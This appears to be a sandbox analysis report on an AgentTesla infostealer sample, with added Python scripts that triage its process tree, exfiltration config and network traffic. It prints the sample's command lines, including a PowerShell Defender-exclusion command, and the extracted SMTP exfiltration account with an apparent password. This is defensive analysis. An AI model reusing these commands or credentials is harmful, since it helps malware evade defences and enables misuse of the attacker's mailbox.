Analysis Report 08042021New-PurchaseOrder.bat

Overview

General Information

Sample Name: 08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
Analysis ID: 383917
MD5: 27233176a2a979195b01a53ec16c7631
SHA1: 0ef424d2000f18e6b83473535bf85d22ed9ab79b
SHA256: 397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
Tags: AgentTesla, bat, Yahoo
Detection

AgentTesla
Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w10x64
  • 08042021New-PurchaseOrder.exe (PID: 4952 cmdline: 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 4436 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5744 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 5828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3636 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1928 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6284 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • SWqTT.exe (PID: 3064 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 5204 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5304 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • SWqTT.exe (PID: 5192 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 7116 cmdline: 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
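The process tree above carries most of the behaviour a responder needs to act on: a PowerShell Add-MpPreference exclusion for the sample path (the report says no Sigma rule matched, although that command line is a standard process-creation detection target), AdvancedRun (a NirSoft utility) launching a .bat from %TEMP% with /RunAs, a cmd /c timeout delay, WerFault.exe invoked against the sample PID, and the same MD5 relaunched from AppData\Roaming as SWqTT.exe. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds a subset of the tree as process-creation records (PIDs, images, command lines and MD5s as listed; parent PIDs follow the nesting, conhost.exe and timeout.exe children are omitted) and runs those checks over them. The rule names are this example's own, and the meaning of AdvancedRun's /RunAs 8 value is deliberately not interpreted.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str
    md5: str


# Constructed from the report's Startup tree (values as printed there).
PROCS = [
    Proc(4952, None, r"C:\Users\user\Desktop\08042021New-PurchaseOrder.exe",
         r"'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe'",
         "27233176A2A979195B01A53EC16C7631"),
    Proc(4436, 4952, r"C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe",
         r"'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' "
         r"/EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' "
         r"/WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run",
         "17FC12902F4769AF3A9271EB4E2DACCE"),
    Proc(5828, 4952, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference "
         r"-ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force",
         "DBA3E6449E97D4E3DF64527EF7012A10"),
    Proc(1928, 4952, r"C:\Windows\System32\cmd.exe",
         r"'C:\Windows\System32\cmd.exe' /c timeout 1", "F3BDBE3BB6F734E357235F4D5898582D"),
    Proc(6460, 4952, r"C:\Windows\SysWOW64\WerFault.exe",
         r"C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784", "9E2B8ACAD48ECCA55C0230D63623661B"),
    Proc(3064, None, r"C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe",
         r"'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'", "27233176A2A979195B01A53EC16C7631"),
]

# Defender exclusion added from the command line (path, process or extension variants).
EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+'([^']+)'", re.I)
# AdvancedRun told to run a script dropped under a Temp directory with an explicit /RunAs mode.
ADVANCEDRUN_RE = re.compile(r"/EXEFilename\s+'([^']*\\Temp\\[^']*\.(?:bat|cmd|exe))'.*?/RunAs\s+(\d+)", re.I)
# cmd.exe used purely as a delay.
TIMEOUT_RE = re.compile(r"(?:^|\s)/c\s+timeout\s+(\d+)", re.I)
# WerFault's -p argument names the crashed PID.
WERFAULT_RE = re.compile(r"-p\s+(\d+)")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(procs: List[Proc]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs for the behaviours the tree exposes."""
    images_by_md5 = {}
    for p in procs:
        images_by_md5.setdefault(p.md5.lower(), set()).add(p.image.lower())

    findings = []
    for p in procs:
        name = basename(p.image)
        if name == "powershell.exe" and (m := EXCLUSION_RE.search(p.cmdline)):
            findings.append((p.pid, f"defender_exclusion:{m.group(1)}"))
        if name == "advancedrun.exe" and (m := ADVANCEDRUN_RE.search(p.cmdline)):
            findings.append((p.pid, f"advancedrun_temp_script:runas={m.group(2)}"))
        if name == "cmd.exe" and (m := TIMEOUT_RE.search(p.cmdline)):
            findings.append((p.pid, f"delay_via_timeout:{m.group(1)}s"))
        if name == "werfault.exe" and (m := WERFAULT_RE.search(p.cmdline)):
            findings.append((p.pid, f"crash_of_pid:{m.group(1)}"))
        # Same hash seen under more than one path, and this instance runs from Roaming: a self-copy.
        if len(images_by_md5[p.md5.lower()]) > 1 and "\\appdata\\roaming\\" in p.image.lower():
            findings.append((p.pid, "same_hash_relaunched_from_roaming"))
    return findings


if __name__ == "__main__":
    for pid, finding in triage(PROCS):
        print(pid, finding)
```

On a live host the exclusion finding should be confirmed and reverted, not just logged: Get-MpPreference exposes the current ExclusionPath list and Remove-MpPreference -ExclusionPath takes the path back out; the dropped SWqTT.exe copy is the persistence artefact to collect before killing the process.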

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}
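The SMTP Info value above is several configuration fields with their delimiters lost: a sender mailbox, then the password and port run together, then the SMTP server. The Python below is an added example, not part of the report or of any extractor: it recovers the two fields that matter for blocking and for notifying the mailbox provider (the account and the server host) from anchors that survive the fusion, and leaves the password/port blob unsplit because that boundary cannot be recovered from the page. RAW_CONFIG is the report's value verbatim; the mail-server label set and the fallback TLD list are this example's assumptions.

```python
import json
import re
from typing import Dict, Optional

# The extractor output as printed in the report; the SMTP fields arrive fused into one string.
RAW_CONFIG = ('{"Exfil Mode": "SMTP", '
              '"SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}')

# Trailing anchor: the exfil server is a hostname beginning with a mail-server label (assumption).
HOST_RE = re.compile(r"(?P<host>(?:smtp|mail)\.(?P<domain>[A-Za-z0-9.-]+))$")
# Fallback for a mailbox that is not on the server's own domain (TLD list is an assumption; extend it).
TLD_FALLBACK_RE = re.compile(r"[^@\s]+@[A-Za-z0-9.-]+?\.(?:com|net|org|ru|info|biz|co\.uk)")


def parse_smtp_info(info: str) -> Optional[Dict[str, object]]:
    """Split a fused '<mailbox><password><port><server>' string into what can be recovered."""
    h = HOST_RE.search(info)
    if not h:
        return None
    head = info[:h.start()]
    # Best case: the mailbox is on the server's domain (yandex.ru here), so the boundary is exact.
    a = re.match(r"[^@\s]+@" + re.escape(h["domain"]), head)
    if not a:
        # Otherwise anchor on a known TLD; this is ambiguous if the password begins with letters.
        a = TLD_FALLBACK_RE.match(head)
        if not a:
            return None
    blob = head[a.end():]  # password and port with no recoverable boundary: kept opaque
    return {"account": a.group(0), "host": h["host"], "secret_len": len(blob)}


def agenttesla_iocs(raw: str) -> Dict[str, object]:
    """Blockable indicators from an extracted AgentTesla config; only SMTP mode is handled here."""
    cfg = json.loads(raw)
    mode = cfg.get("Exfil Mode")
    if mode != "SMTP":
        return {"mode": mode, "host": None, "account": None, "secret_len": None}
    parsed = parse_smtp_info(cfg.get("SMTP Info", "")) or {}
    return {"mode": mode, "host": parsed.get("host"), "account": parsed.get("account"),
            "secret_len": parsed.get("secret_len")}


if __name__ == "__main__":
    print(agenttesla_iocs(RAW_CONFIG))
```

The host is the value to put on the egress block list; the account is what goes into an abuse report to the provider. Nothing here attempts to reconstruct the password, which is both unnecessary for response and unrecoverable with certainty from this string.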

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: SWqTT.exe PID: 3064 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PEs

Source | Rule | Description | Author
32.2.SWqTT.exe.64915d0.5.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
32.2.SWqTT.exe.64915d0.5.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(1 further entry not shown in the report)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 32.2.SWqTT.exe.64915d0.5.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe; ReversingLabs: Detection: 14%
Multi AV Scanner detection for submitted file
Source: 08042021New-PurchaseOrder.exe; ReversingLabs: Detection: 14%

Compliance:

Source: unknown; HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.3:49704 version: TLS 1.0
Source: 08042021New-PurchaseOrder.exe; Static PE information (DllCharacteristics): NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Debug symbol (PDB) path strings, grouped by the dump or dropped file they were found in (stray leading or trailing characters, including the RSDS CodeView marker, are adjacent bytes from the dump rather than part of the path):
Source: WER3A64.tmp.dmp.20.dr (Windows Error Reporting dump; WerFault.exe ran against PID 4952 in the process tree): System.Core.ni.pdbRSDSD, System.Xml.ni.pdb, System.ni.pdbRSDS, System.Core.pdbZ, System.Configuration.ni.pdb, mscorlib.ni.pdbRSDS, System.Configuration.pdb, System.Xml.pdb, System.pdb, Microsoft.VisualBasic.pdb, System.Core.ni.pdb, System.Windows.Forms.pdb, mscorlib.pdb, System.Drawing.pdb, System.Drawing.pdb9, mscorlib.ni.pdb, System.Configuration.ni.pdbRSDSO*, System.Core.pdb, System.Xml.pdbD, System.Windows.Forms.pdb04lk, System.Xml.ni.pdbRSDS, System.ni.pdb
Source: 08042021New-PurchaseOrder.exe (00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp), AdvancedRun.exe (00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp) and AdvancedRun.exe.34.dr: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb
Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F, \??\C:\Windows\Microsoft.VisualBasic.pdb-Q, C:\Windows\mscorlib.pdbpdblib.pdb5t, C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu
Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32#, f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32
Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp: jVisualBasic.pdb, jLC:\Windows\Microsoft.VisualBasic.pdb, O.pdb4(, @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO, ww08042021New-PurchaseOrder.PDB
Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb

Networking:

Source: global traffic; HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1; User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41; Host: myliverpoolnews.cf; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1; User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41; Host: myliverpoolnews.cf
Source: global traffic; HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1; User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41; Host: myliverpoolnews.cf
Source: Joe Sandbox View; IP address: 172.67.150.212 (seen in connection with other malware)
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad (seen in connection with other malware)
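The three GET requests above are a useful detection exercise on their own: a User-Agent that claims X11/Linux on a host the report identifies as w10x64, a .cf hostname, a 32-hex token appended to each article-style path, an HTTPS session negotiated at TLS 1.0, and an IP and JA3 fingerprint the report flags as previously seen with other malware. The Python below is an added example, not part of the report: it rebuilds those requests and the TLS connection as constructed log records and runs them through checks of that kind. The watchlists are seeded only with the report's own two indicators; the free-TLD list is a heuristic of this example; and tying the JA3 value to the 172.67.150.212 connection is an assumption, since the report lists the fingerprint and the connection on separate lines.

```python
import re
from typing import Dict, List, Tuple

HOST_OS = "Windows"  # the report's sandbox: "System is w10x64"

UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41")
PATH = "/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-{}.html"

# Constructed from the report's three GET requests; the 32-hex tokens are the ones it lists.
HTTP_LOG: List[Dict[str, str]] = [
    {"host": "myliverpoolnews.cf", "path": PATH.format(t), "ua": UA}
    for t in ("E349A863A698863617D7B55886FAE832", "ADD8B69CFB72A4D5DBAFC5A0A255FA77",
              "5183A347C7BAD04E3424599E1B978F29")
]
# Constructed from the report's TLS 1.0 connection; the JA3 hash is attached to it by assumption.
TLS_LOG = [{"dst": "172.67.150.212", "dport": 443, "version": "TLS 1.0",
            "ja3": "54328bd36c14bd82ddaa0c04b25ed9ad"}]

# Watchlists seeded with the two indicators the report marks as seen with other malware.
JA3_WATCHLIST = {"54328bd36c14bd82ddaa0c04b25ed9ad"}
IP_WATCHLIST = {"172.67.150.212"}
FREE_TLDS = {"cf", "tk", "ml", "ga", "gq"}  # heuristic: historically free registrations, heavily abused
LEGACY_TLS = {"SSL 2.0", "SSL 3.0", "TLS 1.0", "TLS 1.1"}
HEX32_PATH = re.compile(r"-([0-9A-Fa-f]{32})\.html?$")


def ua_platform(ua: str) -> str:
    """Platform a User-Agent claims; compared against what the endpoint actually runs."""
    if re.search(r"\bWindows\b", ua):
        return "Windows"
    if re.search(r"\b(?:X11|Linux|Android)\b", ua):
        return "Linux"
    if re.search(r"\b(?:Macintosh|Mac OS X|iPhone|iPad)\b", ua):
        return "Apple"
    return "unknown"


def triage_http(records: List[Dict[str, str]], host_os: str = HOST_OS) -> List[Tuple[str, List[str]]]:
    """Per request: (host+path, list of hits)."""
    out = []
    for r in records:
        hits = []
        plat = ua_platform(r["ua"])
        if plat not in ("unknown", host_os):
            hits.append(f"ua_platform_mismatch:{plat}")
        if r["host"].rsplit(".", 1)[-1].lower() in FREE_TLDS:
            hits.append("free_tld")
        if HEX32_PATH.search(r["path"]):
            hits.append("hex32_token_in_path")
        out.append((r["host"] + r["path"], hits))
    return out


def triage_tls(records: List[Dict[str, object]]) -> List[Tuple[str, List[str]]]:
    """Per connection: (dst:port, list of hits)."""
    out = []
    for r in records:
        hits = []
        if r["version"] in LEGACY_TLS:
            hits.append(f"legacy_tls:{r['version']}")
        if r.get("ja3") in JA3_WATCHLIST:
            hits.append("ja3_watchlist")
        if r["dst"] in IP_WATCHLIST:
            hits.append("ip_watchlist")
        out.append((f"{r['dst']}:{r['dport']}", hits))
    return out


def hex_tokens(records: List[Dict[str, str]]) -> List[str]:
    """Pivot values: the per-request 32-hex tokens, for hunting in other hosts' proxy logs."""
    found = set()
    for r in records:
        m = HEX32_PATH.search(r["path"])
        if m:
            found.add(m.group(1).upper())
    return sorted(found)


if __name__ == "__main__":
    for url, hits in triage_http(HTTP_LOG) + triage_tls(TLS_LOG):
        print(url, hits)
    print(hex_tokens(HTTP_LOG))
```

None of these checks is conclusive alone (plenty of legitimate software sends an odd User-Agent, and TLS 1.0 still turns up on old middleboxes); the value is in the stack of them landing on the same destination, together with the memory evidence further down that the content served under those article paths was liverpool.com markup.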
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS 
Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS 
Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text 
